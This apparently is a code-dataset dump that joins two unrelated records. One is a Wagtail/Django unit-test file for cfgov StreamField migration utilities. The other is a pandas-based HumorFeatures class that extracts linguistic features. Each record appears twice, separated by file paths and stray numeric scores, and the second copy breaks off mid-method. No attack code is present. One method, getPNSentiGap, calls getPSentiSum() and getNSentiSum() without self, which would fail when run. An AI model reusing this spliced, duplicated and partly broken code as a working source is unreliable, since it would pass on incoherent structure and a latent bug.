def test_get_streamfield_data_revision_no_field(self):
"""Test that get an empty list for fields that don't exist on
revisions"""
data = get_streamfield_data(self.revision, "notbody")
self.assertEqual(data, [])
def test_set_streamfield_data_page(self):
"""Test that set_streamfield_data correctly sets data for a
given page and saves the page."""
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.page, "body", new_data)
data = self.page.body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_set_streamfield_data_revision(self):
"""Test that set_streamfield_data correctly sets data for a
given revision and saves the page."""
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.revision, "body", new_data)
data = self.revision.as_page_object().body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_set_streamfield_data_page_without_committing(self):
"""Test that set_streamfield_data correctly sets data for a
given page and saves the page."""
self.page.save = mock.Mock()
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.page, "body", new_data, commit=False)
self.assertEqual(self.page.save.mock_calls, [])
def test_migrate_stream_field_page(self):
"""Test that the migrate_stream_field function correctly gets
old data, calls the mapper function, and stores new data
based on the mapper results."""
# Mock the field mapper migration function. We'll inspect the
# call to this and ensure the return value makes it to
# set_streamfield_data.
mapper = mock.Mock(return_value="new text")
migrate_stream_field(self.page, "body", "text", mapper)
mapper.assert_called_with(self.page, "some text")
data = self.page.body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_migrate_stream_field_revision(self):
"""Test that the migrate_stream_field function correctly gets
old data, calls the mapper function, and stores new data
based on the mapper results."""
# Mock the field mapper migration function. We'll inspect the
# call to this and ensure the return value makes it to
# set_streamfield_data.
mapper = mock.Mock(return_value="new text")
migrate_stream_field(self.revision, "body", "text", mapper)
mapper.assert_called_with(self.revision, "some text")
data = self.revision.as_page_object().body.raw_data
self.assertEqual(data[0]["value"], "new text")
@mock.patch("v1.util.migrations.set_streamfield_data")
def test_migrate_stream_field_not_migrated(
self, mock_set_streamfield_data
):
"""Test that the migrate_stream_field function correctly
ignores a field that does not have the correct type and
shouldn't be migrated."""
mapper = mock.Mock()
migrate_stream_field(self.page, "body", "other_type", mapper)
# The mapper should not be called
mapper.assert_not_called()
# set_streamfield_data should not be called
mock_set_streamfield_data.assert_not_called()
@mock.patch("v1.util.migrations.migrate_stream_field")
def test_migrate_page_types_and_fields(self, mock_migrate_stream_field):
"""Test that the migrate_page_types_and_fields function
correctly calls the migrate_stream_field function with
the appropriate values from the list of page types and
fields."""
mapper = mock.Mock()
page_types_and_fields = [
("tests", "StreamPage", "body", "text"),
]
migrate_page_types_and_fields(apps, page_types_and_fields, mapper)
# Check that migrate_stream_field was correct called with the page
mock_migrate_stream_field.assert_any_call(
self.page, "body", "text", mapper
)
# Check that the revision lookup happened correctly and that the
# revision stream field was correctly migrated.
mock_migrate_stream_field.assert_any_call(
self.revision, "body", "text", mapper
)
class ChildStructBlock(blocks.StructBlock):
text = blocks.CharBlock()
class ChildStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
class TestStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
texts = blocks.ListBlock(blocks.CharBlock())
struct = ChildStructBlock()
stream = ChildStreamBlock()
class MigrateDataTests(SimpleTestCase):
def setUp(self):
self.page = "mock"
self.original_data = [
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
]
self.block = TestStreamBlock()
self.value = self.block.to_python(self.original_data)
self.data = self.value.raw_data
@staticmethod
def mapper(page_or_revision, data):
return "mapped"
def test_migrate_data_empty_block_path(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "", self.data, self.mapper
)
self.assertFalse(migrated)
self.assertSequenceEqual(modified_data, self.original_data)
def test_migrate_data_invalid_block_path(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "invalid", self.data, self.mapper
)
self.assertFalse(migrated)
self.assertSequenceEqual(modified_data, self.original_data)
def test_migrate_data_raises_valueerror_on_bad_data(self):
with self.assertRaises(ValueError):
migrate_streamfield_data(
self.page,
("parent", "child"),
[{"type": "parent", "value": "invalid"}],
self.mapper,
)
def test_migrate_data_top_level_block(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "text", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "mapped"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_listblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "texts", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["mapped", "mapped", "mapped"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_structblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "struct", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": "mapped"},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_structblock_child(self):
modified_data, migrated = migrate_streamfield_data(
self.page, ("struct", "text"), self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "mapped"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_streamblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "stream", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{"type": "stream", "value": "mapped"},
],
)
def test_migrate_data_streamblock_child(self):
modified_data, migrated = migrate_streamfield_data(
self.page, ("stream", "text"), self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "mapped"},
{"type": "text", "value": "mapped"},
],
},
],
)
def test_migrate_block_migrated_true_if_data_is_modified(self):
def mapper_modifies_data(page_or_revision, data):
data["b"] = "d"
return data
modified_data, migrated = migrate_block(
self.page, ["a"], {"a": {"b": "c"}}, mapper_modifies_data
)
self.assertTrue(migrated)
self.assertEqual(modified_data, {"a": {"b": "d"}})
def test_migrate_block_migrated_false_if_data_is_modified(self):
def mapper_leaves_data_alone(page_or_revision, data):
return data
modified_data, migrated = migrate_block(
self.page, ["a"], {"a": {"b": "c"}}, mapper_leaves_data_alone
)
self.assertFalse(migrated)
self.assertEqual(modified_data, {"a": {"b": "c"}}) | cfgov/v1/tests/util/test_migrations.py | from unittest import mock
from django.apps import apps
from django.test import SimpleTestCase, TestCase
from wagtail.core import blocks
from wagtail.core.models import Page
from wagtail.tests.testapp.models import StreamPage
from v1.tests.wagtail_pages.helpers import save_new_page
from v1.util.migrations import (
get_streamfield_data,
is_page,
migrate_block,
migrate_page_types_and_fields,
migrate_stream_field,
migrate_streamfield_data,
set_streamfield_data,
)
class MigrationsUtilTestCase(TestCase):
def setUp(self):
self.root = Page.objects.get(slug="cfgov")
self.page = StreamPage(title="Test Page", slug="testpage")
save_new_page(self.page, self.root)
set_streamfield_data(
self.page, "body", [{"type": "text", "value": "some text"}]
)
self.revision = self.page.save_revision()
self.page.save()
def test_is_page_page(self):
"""Test that a page is verifably a page"""
self.assertTrue(is_page(self.page))
def test_is_page_revision(self):
"""Test that a revision is verifiably not a page"""
self.assertFalse(is_page(self.revision))
def test_get_streamfield_data_page(self):
"""Test that get_streamfield_data fetches the data correctly
from a page object."""
data = get_streamfield_data(self.page, "body")
self.assertEqual(data[0]["type"], "text")
self.assertEqual(data[0]["value"], "some text")
def test_get_streamfield_data_revision(self):
"""Test that get_streamfield_data fetches the data correctly
from a revision object."""
data = get_streamfield_data(self.revision, "body")
self.assertEqual(data[0]["type"], "text")
self.assertEqual(data[0]["value"], "some text")
def test_get_streamfield_data_revision_no_field(self):
"""Test that get an empty list for fields that don't exist on
revisions"""
data = get_streamfield_data(self.revision, "notbody")
self.assertEqual(data, [])
def test_set_streamfield_data_page(self):
"""Test that set_streamfield_data correctly sets data for a
given page and saves the page."""
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.page, "body", new_data)
data = self.page.body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_set_streamfield_data_revision(self):
"""Test that set_streamfield_data correctly sets data for a
given revision and saves the page."""
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.revision, "body", new_data)
data = self.revision.as_page_object().body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_set_streamfield_data_page_without_committing(self):
"""Test that set_streamfield_data correctly sets data for a
given page and saves the page."""
self.page.save = mock.Mock()
new_data = [{"type": "text", "value": "new text"}]
set_streamfield_data(self.page, "body", new_data, commit=False)
self.assertEqual(self.page.save.mock_calls, [])
def test_migrate_stream_field_page(self):
"""Test that the migrate_stream_field function correctly gets
old data, calls the mapper function, and stores new data
based on the mapper results."""
# Mock the field mapper migration function. We'll inspect the
# call to this and ensure the return value makes it to
# set_streamfield_data.
mapper = mock.Mock(return_value="new text")
migrate_stream_field(self.page, "body", "text", mapper)
mapper.assert_called_with(self.page, "some text")
data = self.page.body.raw_data
self.assertEqual(data[0]["value"], "new text")
def test_migrate_stream_field_revision(self):
"""Test that the migrate_stream_field function correctly gets
old data, calls the mapper function, and stores new data
based on the mapper results."""
# Mock the field mapper migration function. We'll inspect the
# call to this and ensure the return value makes it to
# set_streamfield_data.
mapper = mock.Mock(return_value="new text")
migrate_stream_field(self.revision, "body", "text", mapper)
mapper.assert_called_with(self.revision, "some text")
data = self.revision.as_page_object().body.raw_data
self.assertEqual(data[0]["value"], "new text")
@mock.patch("v1.util.migrations.set_streamfield_data")
def test_migrate_stream_field_not_migrated(
self, mock_set_streamfield_data
):
"""Test that the migrate_stream_field function correctly
ignores a field that does not have the correct type and
shouldn't be migrated."""
mapper = mock.Mock()
migrate_stream_field(self.page, "body", "other_type", mapper)
# The mapper should not be called
mapper.assert_not_called()
# set_streamfield_data should not be called
mock_set_streamfield_data.assert_not_called()
@mock.patch("v1.util.migrations.migrate_stream_field")
def test_migrate_page_types_and_fields(self, mock_migrate_stream_field):
"""Test that the migrate_page_types_and_fields function
correctly calls the migrate_stream_field function with
the appropriate values from the list of page types and
fields."""
mapper = mock.Mock()
page_types_and_fields = [
("tests", "StreamPage", "body", "text"),
]
migrate_page_types_and_fields(apps, page_types_and_fields, mapper)
# Check that migrate_stream_field was correct called with the page
mock_migrate_stream_field.assert_any_call(
self.page, "body", "text", mapper
)
# Check that the revision lookup happened correctly and that the
# revision stream field was correctly migrated.
mock_migrate_stream_field.assert_any_call(
self.revision, "body", "text", mapper
)
class ChildStructBlock(blocks.StructBlock):
text = blocks.CharBlock()
class ChildStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
class TestStreamBlock(blocks.StreamBlock):
text = blocks.CharBlock()
texts = blocks.ListBlock(blocks.CharBlock())
struct = ChildStructBlock()
stream = ChildStreamBlock()
class MigrateDataTests(SimpleTestCase):
def setUp(self):
self.page = "mock"
self.original_data = [
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
]
self.block = TestStreamBlock()
self.value = self.block.to_python(self.original_data)
self.data = self.value.raw_data
@staticmethod
def mapper(page_or_revision, data):
return "mapped"
def test_migrate_data_empty_block_path(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "", self.data, self.mapper
)
self.assertFalse(migrated)
self.assertSequenceEqual(modified_data, self.original_data)
def test_migrate_data_invalid_block_path(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "invalid", self.data, self.mapper
)
self.assertFalse(migrated)
self.assertSequenceEqual(modified_data, self.original_data)
def test_migrate_data_raises_valueerror_on_bad_data(self):
with self.assertRaises(ValueError):
migrate_streamfield_data(
self.page,
("parent", "child"),
[{"type": "parent", "value": "invalid"}],
self.mapper,
)
def test_migrate_data_top_level_block(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "text", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "mapped"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_listblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "texts", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["mapped", "mapped", "mapped"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_structblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "struct", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": "mapped"},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_structblock_child(self):
modified_data, migrated = migrate_streamfield_data(
self.page, ("struct", "text"), self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "mapped"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "foo"},
{"type": "text", "value": "bar"},
],
},
],
)
def test_migrate_data_streamblock(self):
modified_data, migrated = migrate_streamfield_data(
self.page, "stream", self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{"type": "stream", "value": "mapped"},
],
)
def test_migrate_data_streamblock_child(self):
modified_data, migrated = migrate_streamfield_data(
self.page, ("stream", "text"), self.data, self.mapper
)
self.assertTrue(migrated)
self.assertSequenceEqual(
modified_data,
[
{"type": "text", "value": "foo"},
{"type": "texts", "value": ["foo", "bar", "baz"]},
{"type": "struct", "value": {"text": "bar"}},
{
"type": "stream",
"value": [
{"type": "text", "value": "mapped"},
{"type": "text", "value": "mapped"},
],
},
],
)
def test_migrate_block_migrated_true_if_data_is_modified(self):
def mapper_modifies_data(page_or_revision, data):
data["b"] = "d"
return data
modified_data, migrated = migrate_block(
self.page, ["a"], {"a": {"b": "c"}}, mapper_modifies_data
)
self.assertTrue(migrated)
self.assertEqual(modified_data, {"a": {"b": "d"}})
def test_migrate_block_migrated_false_if_data_is_modified(self):
def mapper_leaves_data_alone(page_or_revision, data):
return data
modified_data, migrated = migrate_block(
self.page, ["a"], {"a": {"b": "c"}}, mapper_leaves_data_alone
)
self.assertFalse(migrated)
self.assertEqual(modified_data, {"a": {"b": "c"}}) | 0.781622 | 0.408395 |
import pandas as pd
from humor_features.utils import *
class HumorFeatures:
def __init__(self, dataset = None):
self.df = dataset
self.df["text"] = self.df["text"].str.replace("!"," !",regex = False)
self.df["text"] = self.df["text"].str.replace("?"," ?",regex = False)
self.df["text"] = self.df["text"].str.replace("."," .",regex = False)
self.df["text"] = self.df["text"].str.replace(","," ,",regex = False)
self.df['textSeq'] = self.df["text"].apply(lambda ind:text_to_word_sequence(ind,filters='%\n\t01245679',lower=False, split=' '))
self.df['textSeq'] = self.df['textSeq'].apply(lambda ind:[word for word in ind if not word in stopwords.words()])
self.df['textSeq'] = self.df['textSeq'].apply(lambda ind:lemmatizeSeq(ind))
#self.df['lenSeq'] = self.df["textSeq"].apply(lambda ind: len(ind))
## Structure
def getNumWords(self):
self.df['nbOfWords'] = self.df["textSeq"].apply(lambda ind:len(np.unique(ind)))
return self
def getMeanWordLength(self):
self.df['meanWordLength'] = self.df["textSeq"].apply(lambda ind:getMeanWordLength(ind))
return self
def getTags(self):
self.df['tags'] = self.df["textSeq"].apply(lambda ind: np.array(pos_tag(ind,tagset='universal')))
self.df['tagsNameChange'] = self.df['tags'].apply(lambda tagSeq: np.apply_along_axis(tagRenamer,1,tagSeq) )
self.df['tagged'] = self.df["textSeq"].apply(lambda ind: FreqDist(tag for (word,tag) in pos_tag(ind,tagset='universal')))
return self
def getGrammarRatios(self):
self.df[['Adj ratio','Adv ratio','Noun ratio','Verb ratio']] = pd.DataFrame(self.df['tagged'].apply(getRatios).tolist(), index= self.df.index)
return self
def getPuncCount(self):
self.df[['N. commas','N. fullStops','N. exclamation','N. qstMark']] = pd.DataFrame(self.df['textSeq'].apply(getPuncCount).tolist(),index = self.df.index)
return self
def getEmojiScore(self):
self.df["EmojisScore"] = self.df['text'].apply(emojiScorer)
return self
def getLaughExprCount(self):
self.df['laughingExpr'] = self.df['text'].apply(getLaughingExprCounter)
return self
def getStructure(self):
return self.getNumWords().getMeanWordLength().getTags().getGrammarRatios().getPuncCount().getEmojiScore().getLaughExprCount()
## Frequency
def getFreqMeanMin(self):
self.df[["freqMean","freqMin"]] = pd.DataFrame(self.df['textSeq'].apply(getWordsFreq).tolist(),index = self.df.index)
return self
def getFreqGap(self):
self.df["freqGap"] = self.df['freqMean'] - self.df['freqMin']
return self
def getFreq(self):
return self.getFreqMeanMin().getFreqGap()
## Written - Spoken
def getSpokenFreqs(self):
self.df[["freqSpokenMean", "freqSpokenMin"]] = pd.DataFrame(self.df['textSeq'].apply(getSpokenSeq).tolist(),index = self.df.index)
return self
def getWrittenFreqs(self):
self.df[["freqWrittenMean", "freqWrittenMin"]] = pd.DataFrame(self.df['textSeq'].apply(getWrittenSeq).tolist(),index = self.df.index)
return self
def getWrittenFreqGap(self):
self.df["freqWrittenGap"] = self.df['freqWrittenMean'] - self.df['freqWrittenMin']
return self
def getSpokenFreqGap(self):
self.df["freqSpokenGap"] = self.df['freqSpokenMean'] - self.df['freqSpokenMin']
return self
def getWrittenSpoken(self):
return self.getSpokenFreqs().getWrittenFreqs().getWrittenFreqGap().getSpokenFreqGap()
## Synonyms
def getSynoLowerGreater(self):
self.df[["synoLower","synoGreater","wordLowestSyno","wordGreatestSyno"]] = pd.DataFrame(self.df["textSeq"].apply(getSynoFeaturesSeq).tolist(),index = self.df.index)
return self
def getSynoGaps(self):
self.df["synoLowerGap"] = self.df["wordLowestSyno"] - self.df["synoLower"]
self.df["synoGreaterGap"] = self.df["wordGreatestSyno"] - self.df["synoGreater"]
return self
def getSyno(self):
return self.getSynoLowerGreater().getSynoGaps()
## Sentiment
def getPSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['posSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[0] )
return self
def getNSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['negSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[1] )
return self
def getObjSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['objSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[2] )
return self
def getPSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['posSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[0] )
return self
def getNSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['negSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[1] )
return self
def getObjSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['objSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[2] )
return self
def getPNSentiGap(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns and not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
if not 'posSentiSum' in self.df.columns:
getPSentiSum()
if not 'negSentiSum' in self.df.columns:
getNSentiSum()
self.df['posNegGap'] = self.df["posSentiSum"] + self.df["negSentiSum"]
return self
def getSentiment(self):
return self.getPSentiSum().getNSentiSum().getObjSentiSum().getPSentiMean().getNSentiMean().getObjSentiMean().getPNSentiGap()
## Synsets
def getSynsets(self):
self.df[["synsetMean","synsetMax","synsetGap"]] = pd.DataFrame(self.df["textSeq"].apply(getSynsetsMeanMaxGap).tolist(),index = self.df.index)
return self
def getAllFeatures(self):
return self.getStructure().getFreq().getWrittenSpoken().getSyno().getSynsets().getSentiment().df | humor_features/HumorFeatures.py | import pandas as pd
from humor_features.utils import *
class HumorFeatures:
def __init__(self, dataset = None):
self.df = dataset
self.df["text"] = self.df["text"].str.replace("!"," !",regex = False)
self.df["text"] = self.df["text"].str.replace("?"," ?",regex = False)
self.df["text"] = self.df["text"].str.replace("."," .",regex = False)
self.df["text"] = self.df["text"].str.replace(","," ,",regex = False)
self.df['textSeq'] = self.df["text"].apply(lambda ind:text_to_word_sequence(ind,filters='%\n\t01245679',lower=False, split=' '))
self.df['textSeq'] = self.df['textSeq'].apply(lambda ind:[word for word in ind if not word in stopwords.words()])
self.df['textSeq'] = self.df['textSeq'].apply(lambda ind:lemmatizeSeq(ind))
#self.df['lenSeq'] = self.df["textSeq"].apply(lambda ind: len(ind))
## Structure
def getNumWords(self):
self.df['nbOfWords'] = self.df["textSeq"].apply(lambda ind:len(np.unique(ind)))
return self
def getMeanWordLength(self):
self.df['meanWordLength'] = self.df["textSeq"].apply(lambda ind:getMeanWordLength(ind))
return self
def getTags(self):
self.df['tags'] = self.df["textSeq"].apply(lambda ind: np.array(pos_tag(ind,tagset='universal')))
self.df['tagsNameChange'] = self.df['tags'].apply(lambda tagSeq: np.apply_along_axis(tagRenamer,1,tagSeq) )
self.df['tagged'] = self.df["textSeq"].apply(lambda ind: FreqDist(tag for (word,tag) in pos_tag(ind,tagset='universal')))
return self
def getGrammarRatios(self):
self.df[['Adj ratio','Adv ratio','Noun ratio','Verb ratio']] = pd.DataFrame(self.df['tagged'].apply(getRatios).tolist(), index= self.df.index)
return self
def getPuncCount(self):
self.df[['N. commas','N. fullStops','N. exclamation','N. qstMark']] = pd.DataFrame(self.df['textSeq'].apply(getPuncCount).tolist(),index = self.df.index)
return self
def getEmojiScore(self):
self.df["EmojisScore"] = self.df['text'].apply(emojiScorer)
return self
def getLaughExprCount(self):
self.df['laughingExpr'] = self.df['text'].apply(getLaughingExprCounter)
return self
def getStructure(self):
return self.getNumWords().getMeanWordLength().getTags().getGrammarRatios().getPuncCount().getEmojiScore().getLaughExprCount()
## Frequency
def getFreqMeanMin(self):
self.df[["freqMean","freqMin"]] = pd.DataFrame(self.df['textSeq'].apply(getWordsFreq).tolist(),index = self.df.index)
return self
def getFreqGap(self):
self.df["freqGap"] = self.df['freqMean'] - self.df['freqMin']
return self
def getFreq(self):
return self.getFreqMeanMin().getFreqGap()
## Written - Spoken
def getSpokenFreqs(self):
self.df[["freqSpokenMean", "freqSpokenMin"]] = pd.DataFrame(self.df['textSeq'].apply(getSpokenSeq).tolist(),index = self.df.index)
return self
def getWrittenFreqs(self):
self.df[["freqWrittenMean", "freqWrittenMin"]] = pd.DataFrame(self.df['textSeq'].apply(getWrittenSeq).tolist(),index = self.df.index)
return self
def getWrittenFreqGap(self):
self.df["freqWrittenGap"] = self.df['freqWrittenMean'] - self.df['freqWrittenMin']
return self
def getSpokenFreqGap(self):
self.df["freqSpokenGap"] = self.df['freqSpokenMean'] - self.df['freqSpokenMin']
return self
def getWrittenSpoken(self):
return self.getSpokenFreqs().getWrittenFreqs().getWrittenFreqGap().getSpokenFreqGap()
## Synonyms
def getSynoLowerGreater(self):
self.df[["synoLower","synoGreater","wordLowestSyno","wordGreatestSyno"]] = pd.DataFrame(self.df["textSeq"].apply(getSynoFeaturesSeq).tolist(),index = self.df.index)
return self
def getSynoGaps(self):
self.df["synoLowerGap"] = self.df["wordLowestSyno"] - self.df["synoLower"]
self.df["synoGreaterGap"] = self.df["wordGreatestSyno"] - self.df["synoGreater"]
return self
def getSyno(self):
return self.getSynoLowerGreater().getSynoGaps()
## Sentiment
def getPSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['posSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[0] )
return self
def getNSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['negSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[1] )
return self
def getObjSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['objSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[2] )
return self
def getPSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['posSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[0] )
return self
def getNSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['negSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[1] )
return self
def getObjSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
